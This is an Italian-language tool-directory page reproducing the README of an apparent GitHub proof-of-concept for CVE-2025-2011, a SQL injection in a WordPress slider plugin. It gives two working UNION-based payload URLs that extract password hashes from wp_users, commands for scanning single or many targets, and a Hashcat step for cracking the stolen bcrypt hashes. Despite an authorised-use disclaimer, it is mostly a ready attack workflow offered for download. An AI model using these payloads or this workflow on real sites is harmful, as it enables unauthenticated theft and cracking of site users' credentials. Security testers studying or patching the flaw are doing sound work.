Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-2011 — Exploit per CVE-2025-2011 | Kitploit
Strumenti/GitHubGitHub/x3rx3ssec/cve-2025-2011
Password CrackingAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubx3rx3ssec/cve-2025-2011

CVE-2025-2011

Exploit per CVE-2025-2011

Vedi Repository
18 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-2011 PoC

Di: X3RX3S Ma orgogliosamente plagiato da Ash Wesker che ha usato GPT sul mio codice con il suo banner ;) vedi qui ---> https://github.com/Ashwesker/Blackash-CVE-2025-2011 Puoi persino vedere il mio nome utente nel 'suo' codice -_-'

Scopo: Un tool proof-of-concept per testare una vulnerabilità di SQL injection (CVE-2025-2011) su siti WordPress.
Disclaimer: Usalo solo su sistemi di tua proprietà o per cui hai un esplicito permesso scritto. I test non autorizzati sono illegali e non etici. Screenshot From 2025-11-02 19-44-16


A proposito della vulnerabilità :)

  • Il plugin Slider & Popup Builder di Depicter per WordPress è vulnerabile a una SQL injection generica tramite il parametro ‘s' in tutte le versioni fino alla 3.6.1 inclusa, a causa di un escaping insufficiente sul parametro fornito dall'utente e della mancata preparazione sufficiente della query SQL esistente. Ciò consente ad attaccanti non autenticati di aggiungere query SQL aggiuntive a query già esistenti, che possono essere utilizzate per estrarre informazioni sensibili dal database.

Funzionalità

  • Due payload SQLi (selezionabili con -p 1 o -p 2)
  • Rilevamento hash Bcrypt ($2a$, $2b$, $2y$), incluse le varianti con prefisso $wp$
  • Risultati salvati per hostname: results_<hostname>.txt
  • Integrazione opzionale con Hashcat per bcrypt (-m 3200) con richiesta di conferma
  • Supporta un singolo URL (-u) o più target tramite file (-f)

Requisiti

  • Python 3.8+
  • Pacchetti pip:
    • requests
    • colorama

Installa le dipendenze:

root@kitploit:~
pip install requests colorama

Opzionale (per il cracking):

  • hashcat installato e disponibile nel tuo PATH (Il default è /usr/share/wordlists/rockyou.txt)
  • Una wordlist come /usr/share/wordlists/rockyou.txt

Utilizzo

Rendi eseguibile lo script (opzionale):

root@kitploit:~
chmod +x CVE-2025-2011.py

Target singolo (payload predefinito 1):

root@kitploit:~
python3 CVE-2025-2011.py -u https://example.com

Target singolo (payload 2):

root@kitploit:~
python3 CVE-2025-2011.py -u https://example.com -p 2

Più target da file (un URL per riga):

root@kitploit:~
python3 CVE-2025-2011.py -f targets.txt

Output

Per ogni host testato lo script salva un file di risultati:

root@kitploit:~
results_<hostname>.txt

Se vengono trovati hash bcrypt, vengono salvati in hashes.txt e ti verrà chiesto se vuoi crackarli con Hashcat. Esempio di comando Hashcat usato dallo script:

root@kitploit:~
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt

Nota: bcrypt è lento per progettazione. Il cracking può richiedere molto tempo e richiedere GPU.


Payload

  • Payload 1 (predefinito):
root@kitploit:~
/wp-admin/admin-ajax.php?action=depicter-lead-index&s=test%27)+UNION+select+user_pass,2,3,4,5+FROM+wp_users--+x
  • Payload 2:
root@kitploit:~
/wp-admin/admin-ajax.php?action=depicter-lead-list&s=test%27))+table_name+UNION+select+user_pass+FROM+wp_users--+x

Uso legale e responsabile

Questo strumento è fornito solo a scopo educativo e difensivo. Non usarlo contro sistemi per cui non hai un permesso esplicito. L'autore e il distributore non si assumono alcuna responsabilità per un uso improprio. Ottieni sempre un'autorizzazione scritta prima di eseguire test su target che non possiedi.


Note e regolazioni

  • Se hai wordlist diverse, aggiorna la funzione run_hashcat nello script per indicare la tua lista preferita.
  • Se Hashcat non è installato o preferisci non crackare gli hash, rispondi N alla richiesta.
  • Puoi regolare timeout e comportamento dei thread nello script per scansioni su larga scala.

Rimescolato insieme da

  • X3RX3S
  • Ispirato da flussi di lavoro di ricerca sulla sicurezza responsabili e da Chocapikk (https://github.com/Chocapikk.
Scarica lo strumento